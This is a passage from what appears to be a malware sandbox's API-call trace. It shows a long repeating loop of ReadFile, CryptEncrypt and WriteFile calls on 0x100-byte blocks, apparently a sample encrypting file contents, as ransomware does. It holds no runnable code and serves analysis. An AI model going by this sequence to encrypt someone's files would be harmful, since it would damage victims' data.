lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.297] GetLastError () returned 0x0 [0151.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.297] GetLastError () returned 0x0 [0151.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.297] GetLastError () returned 0x0 [0151.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.297] GetLastError () returned 0x0 [0151.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.297] GetLastError () returned 0x0 [0151.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.298] GetLastError () returned 0x0 [0151.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.298] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.298] GetLastError () returned 0x0 [0151.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.299] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.299] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.300] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.300] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.300] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.300] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.300] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.300] GetLastError () returned 0x0 [0151.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.301] GetLastError () returned 0x0 [0151.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.302] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.302] CryptEncrypt (in: 